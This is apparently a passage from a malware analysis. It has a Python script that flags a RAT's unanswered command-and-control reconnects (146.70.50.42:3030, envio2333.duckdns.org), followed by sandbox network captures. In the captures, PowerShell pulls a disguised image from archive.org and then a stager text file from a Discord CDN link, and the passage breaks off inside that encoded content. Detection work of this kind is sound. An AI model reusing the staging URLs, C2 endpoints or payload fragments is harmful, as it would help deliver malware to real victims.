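    head, frac = m.group(1).rsplit(".", 1)          # strptime takes at most 6 fraction digits
    ts = datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    rest = m.group(2)
    # Outbound rows read <lport><rport><LOCAL_IP><remote ip>; the local ephemeral
    # port is always five digits, so the port boundary is fixed.
    i = rest.find(LOCAL_IP)
    remote = rest[i + len(LOCAL_IP):]
    if i >= 5 and is_ipv4(remote):
        return ts, int(rest[:5]), int(rest[5:i]), LOCAL_IP, remote
    # Inbound rows read <rport><lport><remote ip><LOCAL_IP>; the digit/IP boundary
    # is ambiguous, so try each split and keep the one giving a sane port pair.
    if rest.endswith(LOCAL_IP):
        before = rest[:-len(LOCAL_IP)]
        for j in range(6, len(before)):
            digits, ip = before[:j], before[j:]
            rport, lport = int(digits[:-5]), int(digits[-5:])
            if is_ipv4(ip) and rport <= 65535 and lport >= EPHEMERAL_MIN:
                return ts, rport, lport, ip, LOCAL_IP
    raise ValueError(f"cannot split fields in {row!r}")


def parse_rows(text):
    return [parse_row(r) for r in text.splitlines() if r.strip()]


def resolved_names(dns_text):
    """Map each answered A-record address to the names that resolved to it."""
    names = defaultdict(set)
    for row in dns_text.splitlines():
        m = DNS_A.search(row)
        if m:
            names[m.group(2)].add(m.group(1))
    return names


def syn_intervals(packets, sport):
    """Seconds between successive outbound packets of one local socket: a
    1-2-4-8 s pattern with nothing inbound is the TCP SYN retransmission schedule."""
    times = [ts for ts, sp, _, sip, _ in packets if sip == LOCAL_IP and sp == sport]
    return [round((b - a).total_seconds(), 1) for a, b in zip(times, times[1:])]


def triage(tcp_text, dns_text, min_sockets=3):
    """Remote (ip, port) endpoints that received connection attempts from at
    least min_sockets distinct local source ports while never sending a packet
    back (the reconnect loop of a RAT whose C2 is down), with DNS context."""
    sockets, responders = defaultdict(set), set()
    for _, sport, dport, sip, dip in parse_rows(tcp_text):
        if sip == LOCAL_IP:
            sockets[(dip, dport)].add(sport)
        else:
            responders.add((sip, sport))
    names = resolved_names(dns_text)
    findings = []
    for (ip, port), sps in sorted(sockets.items()):
        if (ip, port) in responders or len(sps) < min_sockets:
            continue
        hosts = sorted(names.get(ip, ()))
        findings.append({"endpoint": f"{ip}:{port}", "sockets": len(sps), "names": hosts,
                         "dynamic_dns": any(h.endswith(s) for h in hosts for s in DYNDNS_SUFFIXES)})
    return findings


if __name__ == "__main__":
    for finding in triage(TCP_ROWS, DNS_ROWS):
        print(finding)
    print("retry gaps for socket 49725:", syn_intervals(parse_rows(TCP_ROWS), 49725))
```

On the rows above it reports a single endpoint, 146.70.50.42:3030, reached from three sockets with no reply and named by envio2333.duckdns.org, and the retry gaps for socket 49725 come out as 1.0, 2.1, 4.0 and 8.0 seconds. Point it at the full tables and the same logic separates the C2 reconnect loop from the answered archive.org, cdn.discordapp.com and Microsoft telemetry flows, which is the split you want before writing blocking rules: the duckdns name and the 3030 endpoint are the sample's own infrastructure, the rest is shared hosting that cannot be blocked wholesale.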
• archive.org
• ia801700.us.archive.org
• cdn.discordapp.com
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.4  49719  207.241.224.2  443  7776  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  Bytes transferred  Direction  Data
2025-04-26 00:53:45 UTC  127  OUT  GET /download/new_image_20250413/new_image.jpg HTTP/1.1
    User-Agent: Mozilla/5.0
    Host: archive.org
    Connection: Keep-Alive
2025-04-26 00:53:46 UTC  1947  IN  HTTP/1.1 302 Found
    Server: nginx/1.24.0
    Date: Sat, 26 Apr 2025 00:53:45 GMT
    Content-Type: image/jpeg
    Transfer-Encoding: chunked
    Connection: close
    Access-Control-Allow-Origin: *
    Accept-Ranges: bytes
    Location: https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpg
    Strict-Transport-Security: max-age=15724800
    Onion-Location: https://archivep75mbjunhxc6x4j5mwjmomyxb573v42baldlqu56ruil2oiad.onion/download/new_image_20250413/new_image.jpg
    Content-Security-Policy: report-uri https://archive.org/services/csp-report; default-src *; img-src * data: blob:; object-src 'none'; media-src * blob:; connect-src * data:; style-src 'unsafe-inline' https://archive.org/ https://archive.org https://esm.archive.org/ https://esm.ext.archive.org/ https://offshoot.prod.archive.org/ https://av.archive.org/css/ https://av.dev.archive.org/css/ https://accounts.google.com/gsi/ https://synerg.adp.com/; script-src 'nonce-19dfdbb78c85f8513415977e156e82bd' https://archive.org/includes/ https://archive.org/includes/ https://archive.org/components/ https://archive.org/components/ https://archive.org/v/ https://archive.org/v/ https://archive.org/upload/app/ https://archive.org/offshoot_assets/ https://archive.org/offshoot_assets/ https://esm.archive.org/ https://esm.ext.archive.org/ https://polyfill.archive.org/v3/polyfill.min.js https://offshoot.prod.archive.org/ https://av.archive.org/ https://av.dev.archive.org/ https://openlibrary.org/query.json https://emularity-engine [TRUNCATED]
    Referrer-Policy: no-referrer-when-downgrade
2025-04-26 00:53:46 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49720 | Destination IP: 207.241.233.30 | Destination Port: 443 | PID: 7776 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-04-26 00:53:46 UTC | 138 | OUT | GET /6/items/new_image_20250413/new_image.jpg HTTP/1.1
User-Agent: Mozilla/5.0
Host: ia801700.us.archive.org
Connection: Keep-Alive
2025-04-26 00:53:47 UTC | 582 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sat, 26 Apr 2025 00:53:46 GMT
Content-Type: image/jpeg
Content-Length: 3172652
Last-Modified: Sun, 13 Apr 2025 17:38:51 GMT
Connection: close
ETag: "67fbf6ab-30692c"
Strict-Transport-Security: max-age=15724800
Expires: Sat, 26 Apr 2025 06:53:46 GMT
Cache-Control: max-age=21600
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
2025-04-26 00:53:47 UTC | 15802 | IN | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 00 03 04 05 06 07 08 ff c4 00 47 10 00 02 02 01 03 02 05 02 04 05 03 04 01 01 02 0f 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 32 71 14 81 91 a1 06 23 42 b1 c1 52
Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222p"G!1A"Qa2q#BR
2025-04-26 00:53:47 UTC | 16384 | IN | Data Raw: 19 25 ba 75 52 e4 39 e3 12 40 04 ac 07 4c 8b c3 71 85 c7 17 82 26 4c 18 fb 7d 17 8a 2e 0c 38 32 43 87 b9 e7 22 8b e4 0c 94 32 09 b4 93 40 64 2a 47 5c 68 da 9f 93 43 df 0c 8c 09 a0 70 39 d6 ab c7 0e 57 13 27 5c 42 1e 49 39 3b 64 e9 93 f2 c9 27 18 7b 56 0e d8 72 49 58 32 1c 87 a6 49 30 de 0c 35 92 0c 9d f1 95 4b 5d 60 ae 72 49 b7 05 0b cb 01 1c e2 1e 09 c9 06 42 30 8c 99 20 ba ed 78 0e 36 0e 9d 72 42 70 63 05 e2 fb 60 ac 90 0c 1c 9b c6 ba c0 39 c9 06 5d 0c 5e 60 3f 02 f2 ac b2 29 5a 2b 23 9b 19 22 95 da 4d f1 8a 79 c7 77 2f 89 8a 42 6b a6 4c 99 3a e0 93 06 4c 99 11 dc 47 4c 85 89 c1 57 90 82 0d 1c 92 64 c9 f9 64 c1 26 4e f8 70 64 92 b2 64 c9 d3 24 95 93 27 7c 9d 32 48 70 61 ed 83 24 9d b0 82 6a b0 64 c9 26 1c 19 32 42 38 c8 72 58 c1 92 1b e3 06 4c 98 a3 c2
Data Ascii: %uR9@Lq&L}.82C"2@d*G\hCp9W'\BI9;d'{VrIX2I05K]`rIB0 x6rBpc`9]^`?)Z+#"Myw/BkL:LGLWdd&Npdd$'|2Hpa$jd&2B8rXL
2025-04-26 00:53:47 UTC | 16384 | IN | Data Raw: cb 59 a9 65 8a 2d b1 c5 65 58 8d f6 3a ff 00 ce 71 e5 9c c8 3f 0e 8c 3c 95 62 54 10 07 ef f9 67 59 26 39 5e 57 58 ca 12 69 af 81 db 14 8d a0 d7 7e 0f ce 3c a5 96 4a 5a e9 d4 73 8c bc d9 20 f4 e3 8c ce 1d 52 0e db 52 01 1f db 13 69 be 96 32 e7 49 05 2b 72 07 4a 18 a2 f6 ed 3f 96 66 b5 01 08 fa 4f 23 1c a4 88 b6 0d 0e 98 d1 43 52 28 3c df 6c ea 3e 92 1d 34 90 4d 3d 18 98 fa 90 1e 7a 63 26 b3 79 48 e2 1d c4 d1 c7 40 15 49 23 b6 33 6c bb e6 ba f3 8a aa 4d 91 c6 67 1a 94 b4 7b 91 c6 32 33 a3 6e 8c 90 df 18 c6 34 08 ac 58 f3 76 3d b1 55 4b 48 06 e0 aa 7b b1 a1 96 55 ed 7c 24 79 ea 67 53 b4 f2 40 f6 c6 7f 2a 68 8e c4 08 db ac 5f 61 99 86 e7 60 a0 8b aa eb 8c db 95 42 d1 04 73 9b ff 00 ac e1 76 38 6e c6 81 34 32 05 46 07 76 ef 8a c0 19 87 51 c9 ef 96 aa b3 30 fe
Data Ascii: Ye-eX:q?<bTgY&9^WXi~<JZs RRi2I+rJ?fO#CR(<l>4M=zc&yH@I#3lMg{23n4Xv=UKH{U|$ygS@*h_a`Bsv8n42FvQ0
2025-04-26 00:53:47 UTC | 16384 | IN | Data Raw: 21 ab 21 37 db 06 58 ab 63 24 30 ca 62 56 1e e2 b2 a2 6f 9c 66 15 82 b1 4d 09 14 4d 16 e6 6a 39 51 55 0e 42 9b 18 97 ec 71 95 b6 f6 cb 0d bb 30 2c 93 91 6a f1 e2 4f 32 40 2e b1 18 6d 62 06 4c a3 7d f1 70 e0 c8 8f 6c 23 06 41 90 12 6b 18 72 79 e7 17 27 4c 74 0d 8c 1d 72 75 e7 25 64 93 26 1f cf 21 eb c6 49 06 4c 9d 39 c9 92 4c 35 47 e7 25 e4 38 c0 9d f1 e3 20 48 a7 14 fb e2 f7 c5 35 6a 18 b5 55 1f b6 66 00 a9 ef 7f 7c b1 14 b1 17 92 64 d8 46 17 14 d8 ab a9 e9 c6 4e d8 45 64 cb 0a 60 3f 38 7a e0 ef 90 11 cf 19 3b e4 ae 32 64 92 b2 5f 19 2c e1 19 20 bb c3 47 8c 70 83 6d d6 25 f1 88 10 48 e4 e3 a4 a5 14 81 d4 e2 28 2c 40 cb 67 8b c9 70 3e d8 a5 40 1b bf 7c 20 1e 07 7c 19 2e 87 ce 49 6c 8a 05 51 ed 95 9e 30 86 e3 21 62 d4 2b a7 b6 20 3b 64 ed 87 69 14 18 10 72
Data Ascii: !!7Xc$0bVofMMj9QUBq0,jO2@.mbL}pl#Akry'Ltru%d&!IL9L5G%8 H5jUf|dFNEd`?8z;2d_, Gpm%H(,@gp>@| |.IlQ0!b+ ;dir
2025-04-26 00:53:47 UTC | 16384 | IN | Data Raw: a3 e4 75 fd 33 4f 88 fe 0b f0 89 16 97 4f 22 ea 5e 81 2f 60 0a ae 97 d7 be 73 f5 09 24 30 95 92 48 99 88 b0 51 c1 af d3 2e 56 55 2f 4c 73 6c 77 d8 ab b8 b7 4a f7 ce 9f 85 49 bb 50 35 05 36 c6 1c 03 5e ff 00 f0 65 9f c3 85 a0 f1 15 0f a7 f3 a3 90 ec b2 bd 0f 1c 8f d3 3a 32 7f 0e eb 5f f8 80 c6 b5 1c 12 10 6f b5 70 0f e7 99 37 97 d3 7e b8 2e af 4c 59 64 8c ee 5a 16 dc 74 cf 13 a9 85 52 77 88 b2 d8 3c b0 3c 67 a1 f1 9d 34 de 19 ac 5d 2e 9d ac ed 26 89 f8 1f ef 9e 6a 61 21 67 66 07 71 3e a2 47 43 92 e0 dc 1b f0 da 60 bc 39 65 0d 60 f4 cc ae 47 9a 4a 8d a7 1a 06 09 a7 76 71 b8 8e 79 35 f9 62 b4 fe 6c e5 be 9a f8 c7 1a d6 bd 31 1a 8d 25 3b 90 14 dd 0e dd 70 6a 34 c7 d1 3f 0d 1b 82 00 5e 4f 1c 65 11 c9 22 bc 66 22 37 21 e1 7f 3b fc f0 c9 34 ab c9 62 af 64 d5 7b
Data Ascii: u3OO"^/`s$0HQ.VU/LslwJIP56^e:2_op7~.LYdZtRw<<g4].&ja!gfq>GC`9e`GJvqy5bl1%;pj4?^Oe"f"7!;4bd{
2025-04-26 00:53:47 UTC | 16384 | IN | Data Raw: 2c 9c b3 e8 b1 c0 1e d8 0c 9b 78 5f d7 0c 51 1a 3a e3 ea 23 be 56 cb c6 58 8c 45 1e a2 f9 c8 63 b2 48 bc 2c fc 3b fa a8 5d f0 39 c8 88 59 b8 c6 e2 ea b9 cb 13 ad 74 1d ce 1f 7d 9b 4a b1 10 6d 88 e3 24 86 db 91 c0 f7 c0 cf b8 f1 c6 56 4f 27 be 6a d9 3a 82 4b 7d 99 69 9b 8e 06 42 5b d4 41 a1 88 18 8e 9d 71 c3 03 f5 74 cc eb 58 0a 0b 37 06 eb 25 57 42 0e 0d fc 52 8a f9 c5 27 9e 72 e9 76 b0 b0 20 12 2c e1 43 68 dd 6c f6 ca cf d5 ef 80 93 78 69 c3 10 54 ee 1f b6 42 ef 23 70 3b 76 c3 e6 1a a2 01 c9 e6 11 f4 8a f7 ca e2 20 e1 a8 f0 71 88 07 9e 01 c1 bb a5 e4 1c f2 3a e5 12 74 3d 3a e5 91 9d cc 17 df a7 c6 03 44 0f 7c 11 37 97 28 60 01 03 19 ec 7b 87 5f 44 81 c8 e8 7b 65 92 28 6b 71 cf 17 78 03 c6 c6 f7 32 92 3b 0c b7 cb 15 4a cb 47 b1 3c e7 49 3e 98 b5 8d ba f1
Data Ascii: ,x_Q:#VXEcH,;]9Yt}Jm$VO'j:K}iB[AqtX7%WBR'rv ,ChlxiTB#p;v q:t=:D|7(`{_D{e(kqx2;JG<I>
2025-04-26 00:53:47 UTC | 16384 | IN | Data Raw: 7c 1f cc 5b b2 47 c1 c0 48 aa eb 8d aa 44 12 37 db ed 97 fe 20 82 57 68 3e e4 62 25 49 45 4f a8 65 41 7f 9a 2c 8a ef 8f 70 64 ab 26 1f 49 1d fb 0c ab 8a f9 ef 9a 25 4d e7 92 00 03 81 ef 99 ca ed 03 6f 37 d7 33 cb 74 f1 f4 ae d8 1b 5c 8e c5 88 27 b6 33 5a f1 85 45 72 73 15 bd 25 fa 45 fb e1 35 d4 13 78 d2 91 5d 31 18 10 00 c1 16 c9 c9 67 f2 c6 0b cf 38 1e ba 0c 1a 40 d4 08 a1 cf 7c 17 ef 90 29 ee 31 a8 7d f2 ca 00 72 72 cf 2c 91 e9 1c e3 44 00 1c 8f b6 16 6e 6b 37 38 f5 db 36 f6 2b b9 63 31 95 14 71 51 36 73 7f 96 1e f5 ba b2 06 da 3b 1c 64 90 76 53 12 f7 6a e7 11 a3 37 c5 91 ef 8c 5a c5 f7 c8 93 76 38 5c 33 55 00 6f e3 09 af 6b cb df 90 08 e9 95 ed 0c b6 38 c2 f1 33 91 41 24 d8 c6 1c b0 37 44 61 da 83 8b e6 b1 4a b2 9a ed db 0c b1 2c 1a 99 54 9a 72 7e 2f
Data Ascii: |[GHD7 Wh>b%IEOeA,pd&I%Mo73t\'3ZErs%E5x]1g8@|)1}rr,Dnk786+c1qQ6s;dvSj7Zv8\3Uok83A$7DaJ,Tr~/
2025-04-26 00:53:47 UTC | 16384 | IN | Data Raw: 7c 9a 8d 40 55 e8 15 12 c2 af 00 71 64 fb 5e 11 6e fa 34 1e 1b a4 d4 f8 74 3e 56 a3 6e bb 7b 29 8d 81 22 4b 34 b5 d8 7e 67 be 27 89 7f 0e 78 bf 83 c7 1b eb f4 86 15 97 e8 3e 62 b5 fe 84 d6 51 e1 7a 77 d4 f8 84 08 93 08 88 70 43 9e c6 ec 57 ce 75 3f 88 7c 63 c4 9e 79 b4 1a 8d 74 9a a8 d1 c8 dd 23 12 54 83 d3 f6 c5 9e f7 1c 44 d3 c8 c1 49 21 54 f0 18 9c 33 33 2e 9d b4 e6 8a 96 dc 5a b9 e9 8a c1 82 8b 24 8e 9f 03 2f 81 e3 fc 39 47 40 c4 9b dc 47 38 f2 b9 1b e1 2d be dd 9f e1 5f e2 4d 1f 80 c7 a9 33 e8 d6 59 dd 6a 39 28 5a f0 78 06 b8 be 33 6f 86 ff 00 13 4f 27 89 48 f1 86 86 39 9c 6e 11 b6 d2 39 3d 48 eb d7 3c 7e a5 87 98 1a b8 3d 2b 2d d2 eb 84 24 a1 e7 77 be 73 e5 7f 1a e3 f1 f1 b6 f9 3d bf 8c 78 7c 5f c5 1f c5 10 f8 7e 8b 5a d2 22 42 0c b2 c8 49 21 fd 56
Data Ascii: |@Uqd^n4t>Vn{)"K4~g'x>bQzwpCWu?|cyt#TDI!T33.Z$/9G@G8-_M3Yj9(Zx3oO'H9n9=H<~=+-$ws=x|_~Z"BI!V
2025-04-26 00:53:47 UTC | 16384 | IN | Data Raw: 0d 29 ee 7e 31 73 9c 31 b7 f1 1e 1c 9e 18 b1 47 09 6d 46 d2 19 8f 6b ef d3 38 c4 04 b6 24 8a f9 bb f6 ce 86 b6 28 a3 94 3c 52 06 89 97 8a 15 46 87 f9 ca 35 1e 1f 34 50 45 21 da 7c d0 48 07 9a aa ff 00 7c 94 8a f4 9a 76 d5 ca 91 86 54 26 c9 76 a3 5c 65 12 87 09 b8 d9 40 2d 4d d6 ec b6 3d 26 a6 12 b4 8c cc ca 1b 69 60 6c 1c 71 03 f9 4b e6 c8 49 53 b7 ca 26 ff 00 3f 6c 7e 8f da 26 a8 da ed 99 9d ac 53 b5 f2 7f 3c 2c c1 63 62 20 66 27 ab 5d 81 ef 81 22 26 06 58 91 48 2d c1 3d 47 db 2e 8f 57 2e 9f 4c d0 85 42 b4 6c 91 8e 8c 59 06 b6 48 f4 41 0d d0 36 51 87 51 da 8e 62 6d 4b cc 1e 44 dd 18 27 69 50 7a 8e d7 8d e6 4b 31 b4 da 69 68 2b 74 f9 ca 61 dc 64 65 91 69 4f 5a f7 c0 ce 30 d1 46 d2 1d a8 ca a4 8b 26 ba 7e 78 ae 49 1b 5a a9 8d 1e f8 c0 6c 2c 11 45 11 fa 8c
Data Ascii: )~1s1GmFk8$(<RF54PE!|H|vT&v\e@-M=&i`lqKIS&?l~&S<,cb f']"&XH-=G.W.LBlYHA6QQbmKD'iPzK1ih+tadeiOZ0F&~xIZl,E
2025-04-26 00:53:47 UTC | 16384 | IN | Data Raw: d9 ef f1 9a 83 0a a0 33 cf 5d aa 35 d6 d3 d3 db 31 4c 4a 0e 09 02 fb 66 d7 60 54 7b e6 3d 44 aa 63 a1 41 87 c7 5c 22 8e 1e b0 31 67 94 1b 60 2e ba f1 f6 ce 53 68 63 33 7e 2b 51 22 8d 30 21 88 ef c7 c7 e4 73 d3 e9 15 1f c4 1e 27 08 cb b6 cd af c8 cb 3c 67 c3 74 f3 e8 24 86 38 91 5d 81 aa 00 51 ac f4 70 b8 f2 ff 00 93 cb 2e 3e 55 e2 57 36 ad fc b5 20 33 1d a0 2f 55 ed 95 c5 2c f7 34 a6 70 b2 e9 90 24 6a d4 2f 9a aa f8 19 af c5 0e a7 4b a9 78 a7 45 56 50 00 65 15 c0 ce 74 0b f8 89 9b 83 b4 f3 bc f2 2f 3d 9c 66 c7 cf f9 2a 9d 76 a8 6a 34 d1 c8 59 9f 54 86 9d 4a d5 8f 7f d4 e4 d3 2a 38 91 20 d3 b6 a1 d8 76 b3 b4 fb d7 39 e8 7c 0b c2 74 32 be a4 eb 1c 30 68 eb 9e 36 f2 31 1a 3d 2e 8e 4d 2e 87 c3 e5 45 d4 48 7c af c4 0e 06 d2 7a 9f 7e 6b bf 6c dc b8 f3 de 4e 37
Data Ascii: 3]51LJf`T{=DcA\"1g`.Shc3~+Q"0!s'<gt$8]Qp.>UW6 3/U,4p$j/KxEVPet/=f*vj4YTJ*8 v9|t20h61=.M.EH|z~klN7


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49723 | Destination IP: 162.159.134.233 | Destination Port: 443 | PID: 7776 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-04-26 00:53:49 UTC | 230 | OUT | GET /attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=680c5371&is=680b01f1&hm=db042c2e54e6549936afd1049d0288e71f75865cd36201bafae8579d5154155e& HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
2025-04-26 00:53:50 UTC | 1137 | IN | HTTP/1.1 200 OK
Date: Sat, 26 Apr 2025 00:53:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 86016
Connection: close
CF-Ray: 93621afb0e6b52b3-LAX
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 117941
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="ConvertedFile.txt"
ETag: "26b242aa855ca39560812621e6fc2eb8"
Expires: Sun, 26 Apr 2026 00:53:49 GMT
Last-Modified: Thu, 24 Apr 2025 15:30:58 GMT
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-goog-generation: 1745508658077110
x-goog-hash: crc32c=AKJrlg==
x-goog-hash: md5=JrJCqoVco5VggSYh5vwuuA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 86016
x-guploader-uploadid: AAO2VwpglUK22Qztj_OOkcv2ZMuihSDmm6VRrNm-wNVXbYUdOfcFcwP1S3qXsn_7fIePjgc
Set-Cookie: __cf_bm=uyog0SBvtwoVg1cVJ4U.mDXPvZ_EdjgHOF5PeWZ6.uk-1745628829-1.0.1.1-AL4cUdIKVtdv5meN3YcD8_n_Q7OaObihPnrOhqay3eeehplhskwnsz3RLOMQM1qOlF2KJiTUX2R4GLacaxGVtqXudD.GuCmc.qI9TZ8mNRA; path=/; expires=Sat, 26-Apr-25 01:23:49 GMT; domain=.discordapp.com; HttpOnly; Secure
2025-04-26 00:53:50 UTC | 587 | IN | Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 25 32 46 6c 5a 4d 35 68 61 62 4e 25 32 46 36 5a 38 52 77 67 35 48 6d 61 57 76 54 66 51 69 7a 6e 35 38 62 70 76 41 4b 4a 52 56 54 43 4b 73 6f 46 38 74 45 66 79 6a 79 36 58 35 39 52 38 61 6c 35 7a 72 76 35 65 79 6d 6d 74 58 78 6e 4b 59 58 39 31 6f 33 77 35 7a 6e 71 4b 79 71 6a 76 37 6d 78 5a 4d 67 51 46 42 41 50 34 42 36 73 31 53 64 4d 65 71 57 4f 77 64 6d 70 48 32 35 34 6e 66 45 37 72 42 61 6c 35 31 35 5a 35 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FlZM5habN%2F6Z8Rwg5HmaWvTfQizn58bpvAKJRVTCKsoF8tEfyjy6X59R8al5zrv5eymmtXxnKYX91o3w5znqKyqjv7mxZMgQFBAP4B6s1SdMeqWOwdmpH254nfE7rBal515Z5w%3D%3D"}],"group":"cf-nel","max_age":60
2025-04-26 00:53:50 UTC | 1014 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-04-26 00:53:50 UTC | 1369 | IN | Data Raw: 47 62 77 42 58 59 36 4d 6a 64 74 4e 58 59 38 41 43 49 4b 30 67 50 35 52 58 61 73 6c 6d 59 70 52 58 59 77 31 32 62 6a 39 43 50 67 41 69 43 4e 34 6a 62 76 6c 47 64 68 4e 57 61 73 42 48 63 68 39 43 50 67 41 43 49 67 6f 51 44 2b 38 69 49 39 46 57 4f 68 56 54 4d 68 42 54 4e 6b 5a 47 4f 30 30 53 4e 68 6c 6a 59 74 67 54 5a 6d 52 54 4c 7a 49 6d 5a 69 31 69 4d 78 45 32 4e 6d 42 54 5a 34 73 6e 49 39 51 57 53 67 4d 31 54 6b 56 47 64 79 39 47 63 77 56 33 63 38 41 43 49 67 41 43 49 67 6f 51 44 2b 30 53 4c 67 41 54 4d 67 4d 33 64 76 52 6d 62 70 64 46 49 74 30 53 49 38 41 43 49 67 41 43 49 67 6f 51 44 2b 38 69 49 39 68 7a 4e 68 52 47 4d 6b 5a 6a 5a 77 51 32 4d 34 30 69 59 69 56 54 4f 74 6b 7a 4d 79 51 54 4c 78 55 47 4d 34 30 69 4e 33 4d 6d 4e 33 59 6a 5a 78 73 6e 49 39
Data Ascii: GbwBXY6MjdtNXY8ACIK0gP5RXaslmYpRXYw12bj9CPgAiCN4jbvlGdhNWasBHch9CPgACIgoQD+8iI9FWOhVTMhBTNkZGO00SNhljYtgTZmRTLzImZi1iMxE2NmBTZ4snI9QWSgM1TkVGdy9GcwV3c8ACIgACIgoQD+0SLgATMgM3dvRmbpdFIt0SI8ACIgACIgoQD+8iI9hzNhRGMkZjZwQ2M40iYiVTOtkzMyQTLxUGM40iN3MmN3YjZxsnI9
2025-04-26 00:53:50 UTC | 1369 | IN | Data Raw: 41 41 67 41 41 30 41 41 41 41 41 41 41 41 41 41 41 41 55 47 41 74 42 51 59 41 34 45 41 30 42 77 59 41 55 48 41 6b 42 77 62 41 49 48 41 51 42 51 41 41 45 41 41 69 41 41 41 41 41 41 41 6c 42 41 65 41 55 47 41 75 41 67 59 41 55 48 41 30 42 77 55 41 41 41 41 6c 42 51 62 41 45 47 41 75 42 51 5a 41 77 47 41 70 42 67 52 41 77 47 41 68 42 67 62 41 6b 47 41 6e 42 51 61 41 49 48 41 50 42 51 41 41 6b 41 41 36 41 41 41 41 41 41 41 41 41 41 41 41 4d 48 41 72 42 67 63 41 45 47 41 74 42 51 5a 41 51 47 41 68 42 67 63 41 51 46 41 73 42 51 59 41 63 47 41 6c 42 41 54 41 45 41 41 42 41 67 4b 41 41 41 41 41 41 41 41 41 51 48 41 6f 42 77 5a 41 6b 47 41 79 42 51 65 41 41 48 41 76 42 77 51 41 77 47 41 68 42 77 5a 41 55 47 41 4d 42 51 41 41 45 41 41 6d 41 41 41 41 41 41 41 6c 42
